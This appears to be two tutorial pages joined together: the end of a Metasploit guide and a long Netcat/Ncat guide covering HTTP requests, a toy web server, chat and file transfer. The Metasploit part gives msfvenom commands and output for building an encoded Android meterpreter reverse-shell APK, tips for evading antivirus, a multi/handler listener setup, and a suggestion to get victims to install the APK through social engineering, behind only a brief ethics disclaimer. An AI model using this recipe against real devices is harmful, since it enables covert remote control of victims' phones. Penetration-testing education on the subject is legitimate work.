    StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
    StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
    VERBOSE                      false            no        Enable detailed status messages
    WORKSPACE                                     no        Specify the workspace for this module

Evasion options for payload/android/meterpreter/reverse_tcp:
=========================

    Name  Current Setting  Required  Description
    ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐

There are loads of options for this exploit, as you can see. The options are divided into two categories. Basic options and Advanced options. You can create a payload just by setting up the basic options. However, advanced options are very important as well. They offer customization as well as play a crucial role to evade threat detection systems.

You can modify them and check how many anti-viruses detect it as a threat. Many online websites allow you to check your payloads. Keep in mind, however, that these systems might store your data and add them to the anti-virus database, rendering your payloads to be detected more often.

VirusTotal is a website that allows you to upload a file and check for viruses. There are online virus checkers for almost all the anti-virus packages (avast, avg, eset, etc.). At the end of this article, you’ll see me testing our payload on these websites.

Encoding your payload to evade detection

Before we create the payload, remember encoders? Encoders are the modules that encrypt the code so it becomes harder for the threat detection systems to detect it as a threat. Let’s see how to encode our payload. At first, list the encoder options available. I’ll use the ruby based encoders by grepping ruby:

msfvenom -l encoders | grep ruby
    ruby/base64                   great      Ruby Base64 Encoder

Let’s set up the basic options and create a basic payload now:

msfvenom -p android/meterpreter/reverse_tcp -e ruby/base64 LHOST=192.168.74.128 LPORT=8080 -o /root/Desktop/payload.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of ruby/base64
ruby/base64 succeeded with size 13625 (iteration=0)
ruby/base64 chosen with final size 13625
Payload size: 13625 bytes
Saved as: /root/Desktop/payload.apk

Here, the LHOST is our IP address and LPORT is the port for the connection. You should change the default port to evade easy detection. Now, before we send this payload, we need to set up the handler for the incoming connection. Handler is just a program that will listen on a port for incoming connections, since the victim will connect to us. To do that, we’ll fire up msfconsole and search multi/handler:

search multi/handler

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                                 ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/linux/local/apt_package_manager_persistence  1999-03-09       excellent  No     APT Package Manager Persistence
   1  exploit/android/local/janus                          2017-07-31       manual     Yes    Android Janus APK Signature bypass
   2  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3  exploit/linux/local/bash_profile_persistence         1989-06-08       normal     No     Bash Profile Persistence
   4  exploit/linux/local/desktop_privilege_escalation     2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   5  exploit/multi/handler                                                 manual     No     Generic Payload Handler
   6  exploit/windows/mssql/mssql_linkcrawler              2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   7  exploit/windows/browser/persits_xupload_traversal    2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   8  exploit/linux/local/yum_package_manager_persistence  2003-12-17       excellent  No     Yum Package Manager Persistence


Interact with a module by name or index. For example info 8, use 8 or use exploit/linux/local/yum_package_manager_persistence

As you can see, number 5 is our manual and Generic Payload Handler. Use this one and we must set our payload matching to the one we just used (/android/meterpreter/reverse_tcp) –

use 5

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload /android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Wildcard Target

In the output, we can see that the default payload for exploit (multi/handler) was (generic/shell_reverse_tcp). So we set the payload to our desired one (android/meterpreter/reverse_tcp). Now let’s set up the LHOST to 192.168.74.128 (attack machine’s IP) and LPORT to 8080 just like we did when we created the payload:

msf6 exploit(multi/handler) > set LHOST 192.168.74.128
LHOST => 192.168.74.128
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080

Now you can run this exploit to start listening in for connections –

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.74.128:8080

The meterpreter session will start as soon as the Android device installs the apk file. This concludes how you can create payloads with the msfvenom tool. You can send this apk out and ask the victims to install it by social engineering or go install it yourself if you have physical access. Bear in mind that violation of privacy and system penetration without permission is illegal and we suggest you use these techniques ethically for learning purposes only.

Checking if your payload can evade anti-virus programs

We’ve already told you how you might try to evade the anti-virus software. Let’s have some fun now. We’ll check how many viruses can detect our apk payload that we just created.

The result is phenomenal. Or, there might be something wrong here! The VirusTotal website might not properly work for the APK files. Whatever it may be, you now know how to create custom payloads for penetration testing.

Conclusion

In this tutorial, you learned about Metasploit Framework from the basics to the advanced level. You can experiment and practice to learn more on your own.

We showed you how to use Metasploit on an intentionally vulnerable machine Metasploitable 2. In reality, these types of backdated and vulnerable machines might not be present nowadays. However, there are so many vectors from where an attack might be possible. Keep on learning.

Remember to use your knowledge for the good. We hope you liked our tutorial. If you have something you’d like to ask, feel free to leave a comment. We’ll get back to you as soon as possible.

This tool can be used for creating any connections over TCP or UDP protocol which makes it an excellent debugging tool. It helps the user investigate connections directly by connecting to them.

Netcat can also perform port scanning, file transfer, and sometimes it might be used by the hackers or penetration testers for creating a backdoor into a system.

In this tutorial, we’ll be covering the Netcat utility or nc command in detail.

Netcat was developed back in 1995. Despite its usefulness and popularity, it was not maintained. Many other versions of it have been developed since then. One of the most prominent among them is called Ncat, developed by the Nmap project.

Ncat expands on the features of the traditional Netcat package. We’ll also touch on some of the functionalities of this tool.

However Ncat lacks the port scanning feature that Netcat has. This is because Nmap can already be has much more advanced port scanning capabilities.

I have installed Ncat and will be using it this tutorial, but I’ll refer to the software by both Ncat or Netcat.

Installing traditional Netcat & Ncat

Netcat is available for Linux, Windows, and macOS.

If you’re running a Linux machine, chances are Netcat is already installed. However, you do need to install Netcat in other operating systems.

Ncat is not available on any of the operating systems by default, so we’ll have to install it no matter what OS we’re using.

Installing Ncat on Linux

If you’re running Debian or Ubuntu-based systems, you can install it using the apt utility. To install ncat run:

sudo apt-get install ncat

On Redhat or CentOS-based distros, you can use yum. To install ncat run:

sudo yum install ncat

Notice: If you install Ncat then the nc or netcat command will use Ncat by default.

Installing Ncat will allow all the functionalities of the traditional Netcat and much more.

Installing Ncat on Windows

You can install Ncat on Windows by installing Nmap – and it will be installed alongside it.

To install Nmap you’ll use their self-installer, which you can find here https://nmap.org/download.html. Find and download the latest stable self-installer, which looks something like this nmap--setup.exe, and then run it after it’s downloaded.

Installing Ncat on MAC OS X

You should be able to get Ncat installed alongside Nmap. To install Nmap on Mac OS X you can check the installation instructions on Nmap.org.

You can also find a very short section with instructions on how to install Nmap on Mac OS X in our Nmap tutorial, should you have issues with the instructions on their site.

Installing Ncat on Android with Termux

Assuming that you already have Termux installed on your Android, you can install Ncat by installing Nmap.

To do this update your package index:

apt update

Then install Nmap by running:

pkg install nmap

Basics of connections with Netcat

Before we learn how to use the tool, let’s learn some basics of how it works.

Netcat can produce different types of connections based on how you use it. Traditional nc command will only work over the TCP and UDP protocol. However, the Ncat command supports SSL, IPv6, etc.

You can think of Netcat to be performing the tasks of both the client and the server in a Client-Server based connection model. You can read more about this model in our tutorial, Basics of HTTP Requests with cURL, under the Basics of HTTP Requests & Responses section.

In short, you can create a server listening in any port and a client connecting to any port with Netcat.

Let’s see how to create a client and a server with Netcat.

Creating a client with Netcat

If you’re reading this tutorial, then most likely you’re using some browser. Your browser work as a client to get the page from our nooblinux.com server.

You can create a client by connecting to any host and port you like with Netcat.

Netcat has a basic syntax of:

nc [options] host port

You can use the -n flag to enter numeric-only or the IP address of the host; which will bypass the DNS name resolution:

nc -n [IP address] port

Type in the hostname or IP address and Port with the nc command to create a client:

nc -v example.com 80

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.

Note: I’m using Ncat throughout this article. If you’re using Netcat, your output for the above command may look like this:

Connection to example.com 80 port [tcp/http] succeeded!

Here, we created a client with Ncat connecting to the example.com server on port 80.

Once you run this command you’ll see nothing is happening after this.

This just means that you’ve connected with the server.

It might feel unusual because most of us are used to a prompt symbol that indicates the system’s readiness to perform the next command, but this is just how it works with Netcat/Ncat.

Now you can request the server and then get a response.

Let’s try to send something to the server.

Type in some text after the output texts shown above and hit Enter twice (this is because some requests require multiple lines, so the first Enter is a newline, and the second one it sends the request). It can be any text. I’ll just write hi.

Let’s see what response we get from the server:

Warning: inverse host lookup failed for 93.184.216.34: Unknown host
example.com [93.184.216.34] 80 (http) open
hi

HTTP/1.0 501 Not Implemented 
Content-Type: text/html 
Content-Length: 357 
Connection: close 
Date: Sat, 10 Jul 2021 20:07:39 GMT 
Server: ECSF (dcb/7F60) 

<?xml version="1.0" encoding="iso-8859-1"?> 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> 
<title>501 - Not Implemented</title> 
</head> 
<body> 
<h1>501 - Not Implemented</h1> 
</body> 
</html> 

We sent hi to the server and then the server sent us the response that you can see in the output. The server sent us the Status code 501 Not Implemented which means the server does not support the functionality to fulfill our request.

That’s a given. Let’s request something that a server understands.

HTTP Requests with Netcat

If you know anything about HTTP requests then you should know that your browser performs a GET request to show you a webpage. After you have connected to the server, your browser sends special messages to the server with the request and the server responds accordingly.

cURL is a very good utility that can perform any HTTP requests (we also have a tutorial on cURL if you’re interested Basics of HTTP Requests with cURL: An In-Depth Tutorial).

Let’s find out what it sends to get a response back from the server.

Run the curl command in a verbose mode (-v) and set the -I flag or --head option to only see the Request and Response Headers:

curl -v -I example.com

*   Trying 93.184.216.34:80...
* TCP_NODELAY set
* Connected to example.com (93.184.216.34) port 80 (#0)

> HEAD / HTTP/1.1
> Host: example.com
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Accept-Ranges: bytes
Accept-Ranges: bytes
< Age: 443586
Age: 443586
< Cache-Control: max-age=604800
Cache-Control: max-age=604800
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Date: Sat, 10 Jul 2021 20:16:51 GMT
Date: Sat, 10 Jul 2021 20:16:51 GMT
< Etag: "3147526947"
Etag: "3147526947"
< Expires: Sat, 17 Jul 2021 20:16:51 GMT
Expires: Sat, 17 Jul 2021 20:16:51 GMT
< Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
< Server: ECS (dcb/7F38)
Server: ECS (dcb/7F38)
< X-Cache: HIT
X-Cache: HIT
< Content-Length: 1256
Content-Length: 1256

<
* Connection #0 to host example.com left intact

As you can see in the output, lines 1 to 3 are the Connection part. The next section, lines 5 to 9,  is the request that curl, which in this case is our client, sent to the server. The later section is the Response Header that the server sent back.

Now, when you’re running Netcat, the lines 1 to 3 portion is being performed at first. Then you can talk to the server. Let’s generate the same response using Netcat.

To get the response from the server, we have to craft the request message first. The head request portion of the output from the curl command is:

HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

Now let’s connect Netcat to example.com again.

nc -v example.com 80

Now copy and paste the above portion (the GET Request), after the the Ncat: Connected to 93.184.216.34:80. output, in the Netcat terminal and hit Enter twice.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.
HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

HTTP/1.1 200 OK
Age: 594540
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Sat, 10 Jul 2021 22:33:44 GMT
Etag: "3147526947+ident"
Expires: Sat, 17 Jul 2021 22:33:44 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (dcb/7EA3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256

This is great! You’ve just got the same Request and Response Headers that you got using cURL as your client.

Important: At first glance this response may not look the same as with cURL, because the cURL response has duplicate lines – if you look closely, the responses are near identical.

Let’s try OPTIONS request instead of HEAD request. This time we’ll just type the request in, since it’s shorter.

First we’ll connect to the example.com server.

nc -v example.com 80

We’ll get the usual output:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.

After which we’ll just write the OPTIONS request OPTIONS / HTTP/1.0 and press Enter twice:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 93.184.216.34:80.
OPTIONS / HTTP/1.0

HTTP/1.0 200 OK
Allow: OPTIONS, GET, HEAD, POST
Date: Sun, 11 Jul 2021 11:34:16 GMT
Server: ECS (dcb/7F14)
Content-Length: 0
Connection: close

Using Printf and Piping with Netcat

Important Note: Sometimes you might get some error while typing the requests inside Netcat. That is because HTTP requests require certain formatting with Line Endings.

There also may be other reasons that your requests don’t work, as such it’s good to know that you have an alternative method of making requests and sending them through Netcat.

You can also try any request piping the output of printf command into Netcat.

To do this, run the following command outside of Netcat:

printf "HEAD / HTTP/1.1\r\nUser-Agent: curl/7.74.0\r\nHost: example.com\r\nAccept: */*\r\n\r\n" | nc example.com 80

In this command, \r create the new lines for the HTTP request.

These are called carriage return (cr) and line feed (lf). These names are derived from the age of typewriters.

You basically sent the same HEAD request as before, but wrote it on one line.

HEAD / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

Becomes:

HEAD / HTTP/1.1\r\nUser-Agent: curl/7.74.0\r\nHost: example.com\r\nAccept: */*\r\n\r\n

After that, we use the printf command (print formatted), which properly formats our the request, so then we pass it on to Netcat through piping (the | symbol).

Creating a Server with Netcat

In previous sections, we showed you how to create a client with Netcat.

You essentially learned what a browser does to request a webpage from the server.

Now we’ll show you how the server responds with the help of Netcat.

Netcat can start listening on any port you specify. This is what gives it the ability to create a server on the fly.

Let’s learn how to listen on a port with netcat before we get started.

Listening on a port with Netcat

You can see the available options Netcat offers by simply typing in nc -h. By default, netcat creates TCP connections. You can create UDP connections using the -u flag. However, we’ll use the default TCP connection for now.

The -l flag can be used for listening and the -p flag is for specifying the port to listen on.

Let’s look at an example. We’ll make netcat listen on port 4000 by combining the two flags together:

nc -lp 4000

This command will make netcat start listening on port 4000. But you’ll only see the cursor blinking.

You can use the keyboard interrupt CTRL + C to stop the command.

Let’s turn on the verbose output by combining the -v flag:

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now you will see netcat telling you that it’s listening on port 4000. This is how you start listening on any port.

Creating a simple web server with Netcat

Now that you know how to listen on ports with Netcat, let’s try to create a simple webserver with netcat. You’ll learn how a server responds to a client in this section.

First, let’s start a Netcat listening on port 5000 in verbose mode:

nc -vlp 5000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on 0.0.0.0:5000

Now fire up your browser and try connecting on this port. Type localhost:5000/ in your browser. Hit enter and take a look at your terminal window running Netcat. You’ll see the browser request directly showing up in your Netcat terminal:

Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:46830.
GET / HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Side note: You can tell from the User-Agent value, which is Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8. You can also use a tool that analyzes user agent strings such as this https://developers.whatismybrowser.com/useragents/parse/, to find out. Just paste in the user agent string in the input field and click Parse this user agent.

Interesting, isn’t it? Can you guess which browser I’m using? It’s Firefox 89 on Ubuntu Linux.

Now that the client (Firefox) has requested the server (netcat) you can do more cool things.

You can start typing in the response Firefox will get.

However, you need to speak the language of the browser! Otherwise, you won’t see the output.

Remember the response Header we got from example.com in the previous section? Let’s take a look:

HTTP/1.1 200 OK
Age: 594540
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Sat, 10 Jul 2021 22:33:44 GMT
Etag: "3147526947+ident"
Expires: Sat, 17 Jul 2021 22:33:44 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (dcb/7EA3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256

As always, the status code is the first line of the response. We do not require all of the responses, however.

We’ll just use the Status code, Content-Type and Server, which I’ve highlighted.

With that let’s try to construct our server message:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

After typing this in hit enter twice and create a new empty line.

Next, you’ll type in the HTML page yourself and see it showing up on the browser in real-time! We’ll create a title for our page in real-time. If you know the HTML you can do it yourself. You can also copy this in your terminal.

The message should look something like this:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title>NoobLinux</title>

Hit enter and you’ll see the browser tab change from localhost:5000 to NoobLinux. Here’s a quick video of me doing that, in case this is a bit confusing:

Cool! Now let’s do more. Create a heading with <h1></h1> tags.

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title>NoobLinux</title>
<h1>Can you see me?</h1>

Hit enter and voila! You’ll see the heading appearing in the browser in real-time.

You can keep playing like this and the browser will show output according to your messages.

Lastly, we’ll do a final example where we add a photo:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title> NoobLinux </title>
<h1>Can you see me?</h1>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Image_created_with_a_mobile_phone.png/1280px-Image_created_with_a_mobile_phone.png">

Communicating over SSL with Ncat

You can receive as well as create any connections over TCP and UDP protocols with Netcat. The traditional Netcat does not support SSL encryption and HTTPS. Ncat, however, comes with SSL support.

We can activate it by using the --ssl flag. If you haven’t installed Ncat, now would be a good time.

Now we’ll play with sending a HEAD request to github.com and see how to activate SSL support, and what happens when we don’t.

First we’ll send a HEAD request like we did in the beginning of the tutorial, to the github.com server, on port 80.

We’ll make the request by sending it from print by using printf and piping with Netcat (remember when we discussed this earlier).

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v github.com 80

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 140.82.121.4:80.
HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://github.com/

You can see that the github.com server gives us the status code 301, which means a redirect should be done.

Indeed, the github server accepts connection only with HTTPS or SSL encryption with the HTTP requests.

Let’s try using the port 443 as we know it is for HTTPS.

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v github.com 443

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 140.82.121.4:443.
Ncat: 37 bytes sent, 0 bytes received in 0.26 seconds.

It also fails this time. This is because ncat is sending requests without SSL encryption. We have to enable SSL encryption.

Type the following command using the --ssl flag of the Ncat command:

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v --ssl github.com 443

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: SSL connection to 140.82.121.4:443. GitHub, Inc.
Ncat: SHA-1 fingerprint: 8463 B3A9 2912 CCFD 1D31 4705 989B EC13 9937 D0D7
HTTP/1.1 200 OK
Server: GitHub.com
Date: Mon, 12 Jul 2021 00:38:44 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, Accept-Language, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
ETag: W/"94946c032884213d15c51f6ed29ed03e"
Cache-Control: max-age=0, private, must-revalidate
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; connect-src 'self' uploads.github.com www.githubstatus.com collector.githubapp.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events translator.github.com wss://alive.github.com github.githubassets.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com render-temp.githubusercontent.com viewscreen.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ *.githubusercontent.com customer-stories-feed.github.com spotlights-feed.github.com; manifest-src 'self'; media-src github.githubassets.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/socket-worker-3f088aa2.js gist.github.com/socket-worker-3f088aa2.js
Set-Cookie: _gh_sess=tYm0qZ0oXFzUG8Dc2YucTOhIJuxeFGVTx4tGW%2FZcYx4QI9MrYoSWsuVvGqMCZh0YG7eUdsDe6231%2FnGMLJsxNjhkF3mNyblLnF8mPQX%2BVltD6E98n0Tih9DUf2I49lYyOCjp6UvUewn1NAYW%2FGOKFUn8%2F2dUvHBJQ%2F3UKEE%2F9w97caNikSZDtZxnaF91O8H0AV%2FkKuUVwJASOsxJviza87B13bE9eLfzMej9ndm2Ywb5yfTUEYccO3sPjRHp7UkSWnRFkt5LHuAEMg81QCCgmA%3D%3D--cVgPJ6RLH%2FItXYgz--Rk9K72INktZw6RibFZJoxA%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
Set-Cookie: _octo=GH1.1.1661960893.1626050330; Path=/; Domain=github.com; Expires=Tue, 12 Jul 2022 00:38:50 GMT; Secure; SameSite=Lax
Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Tue, 12 Jul 2022 00:38:50 GMT; HttpOnly; Secure; SameSite=Lax
Accept-Ranges: bytes
X-GitHub-Request-Id: 041C:0BCA:7B79525:7FD6376:60EB8F1A

Ncat: 37 bytes sent, 2595 bytes received in 0.26 seconds.

As you can see, now the output is showing correctly. We can also see the cookie and some encryption information as well in the header.

Sometimes you’ll require a certificate to connect to the host. You can create an SSL Certificate and SSL key with --ssl-cert and --ssl-key respectively. Find more on this on the Ncat user manual’s SSL page.

Creating a simple chat using Netcat

Now that you know how to create a client and a server with Netcat, let’s build both and create a chatting functionality between them.

You can do this over remote network machines or within your local network. We’ll just need two computers that can run Netcat (it can be a computer, virtual machine or phone with a terminal and netcat installed)

What we’ll do: On the first machine (doesn’t matter which) we’ll just run the command to create a server and listen on a port, in our case 4000. On the second machine we’ll run the command to connect to the first machine’s IP and port, thereby establishing the connection. From there we can just write messages from one machine and they’ll instantly appear on the other.

Let’s get started.

Within your local network

For our example, I’ll create a chat with a VMware virtual machine running Ubuntu 20.04.

You can try out the same thing, or you can use machines connected to your WiFi – such as if you have multiple computers that can have Netcat installed on them, or an Android phone running Termux (installed from f-droid.org on which you can install Netcat).

Most likely there are options for iOS, and other operating systems as well, however I haven’t tried them myself.

Make sure both the machines have Netcat installed.

First, figure out the private IP address (IPv4) of the computer where we’ll run the server on, because we’ll need to know it so we can connect to it from the second computer.

Finding your private IP address

On Linux, you can determine your private IP address using command such as ip addr, ifconfig or hostname -I (uppercase I).

Determine your private IP address using ip addr or ifconfig

We’ll use ip addr since it’s meant to be a replacement for ifconfig, and ifconfig may not come pre-installed on recent Linux systems.

When you run it, the system will display all your network interfaces.

ip addr

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:12:e9:70 brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.145.131/24 brd 192.168.145.255 scope global dynamic noprefixroute ens33
       valid_lft 992sec preferred_lft 992sec
    inet6 fe80::c567:c033:897f:58ea/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

What we’re interested in is what comes after inet in the details for the network interface that we’re using.

Your output may display more network interfaces, such as eth0, wlan0 and so on.

To determine the network interface that you’re using you can use the route command:

route

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         _gateway        0.0.0.0         UG    100    0        0 ens33
link-local      0.0.0.0         255.255.0.0     U     1000   0        0 ens33
192.168.145.0   0.0.0.0         255.255.255.0   U     100    0        0 ens33

The Iface column on the same line with default in the Destination column should tell you the interface that you are using (the highlighted line).

As we can see, the interface I’m using is ens33, and if we look up to the output from where I ran ip addr, under ens33 and after inet we see 192.168.145.131.

So my private IP address is 192.168.145.131.

Determine your private IP address using hostname -I

You can also easily display your private IP address using hostname -I (uppercase I), however you will be shown multiple IPs if you have multiple configured interfaces.

For example, when I run it on the same machine as before, I get a quick and clean private IP address in the output.

hostname -I

192.168.145.131

However, when I run it on a different machine:

10.0.2.15 192.168.33.10

In this case, the second IP (192.168.33.10) is the one I can connect to on my local network via Netcat.

I usually use the ip addr method.

We’ll refer to the computers as:

1. Machine 1 – the computer whose private IP address we’ve determined, where we will create the server and listen on port 4000
2. Machine 2 – the computer that we’ll use to connect to Machine 1

Now, assuming that you’ve found your private IP address for Machine 1, create a server on it, listening on any port (I’ll use 4000). To do this run:

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now Netcat will be listening on Machine 1 which has the IP address of 192.168.145.131. This is our server.

Now let’s connect to this server from another device within our local network (which is Machine 2.

We’ll use the server’s IP address and port to connect to it. Run the following command, replacing the IP with your machine’s private IP address:

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

As we can see our client has connected to the server. If we take a look at our server we’ll instantly see the machine connected to it:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.

Now the client-server connection has been established. You can type in anything in any of the machines and you’ll see the message instantly on the other machine. Here are the commands and outputs of each machine:

n -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000
Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.
Hi. Can you see this?
Yes, I can. Hi!
So what are you thinking about?
Oh, you know, tutorials & stuff.

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
Hi. Can you see this?
Yes, I can. Hi!
So what are you thinking about?
Oh, you know, tutorials & stuff.

[Video] Demo of creating a simple chat using Netcat

Here’s a very short video demonstrating this. On the left there’s what we call Machine 1, which is an Ubuntu 20.04 virtual machine, and on the left I’m using Cmder on Windows 10.

Within a single computer

If you do not have access to another computer in your local network, you can also try this on your computer with two terminals.

Open two terminals and just follow the same procedure with the nc command.

Create a server and a client and you can send text from one to the other terminal and communicate between them in real-time.

Transferring files between two hosts using Netcat

You’ve already seen how Netcat can send texts from one host to another using the client-server setup. Now let’s learn to send some more useful things rather than just texts.

You can send any file over netcat. There are two ways to do this:

1. Serve the file on the Netcat server
2. Push the file from the client side

We’ll cover both.

Serve the file from a server

Let’s start with how to serve the file using the Netcat server.

In this method, the server has to be created on the machine that contains the file.

Pipe the file into the server:

cat nooblinux_assets.zip | nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

On the other machine (also known as the client), type in the following to connect to the server and save the file, replacing the IP with your machine’s private IP:

nc -v 192.168.145.131 4000 > nooblinux_assets.zip

You will see the typical output.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

And on the first machine (the server) you will see the typical output as we’ve seen before, when the other machine connects to it:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.

Your file will transfer. But you might notice a problem with this method immediately – there’s no indication if the file completed transferring or not. The connection stays open.

This brings us to the second method.

Push the file to the server from the client

Now we’ll just listen on a port on the server and save whatever comes to it instead of serving the file.

This means the machine with the file will be the client and it will send the file to the server.

Let’s create a server and save the incoming data:

nc -vlp 4000 > whatever_may_come.zip

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
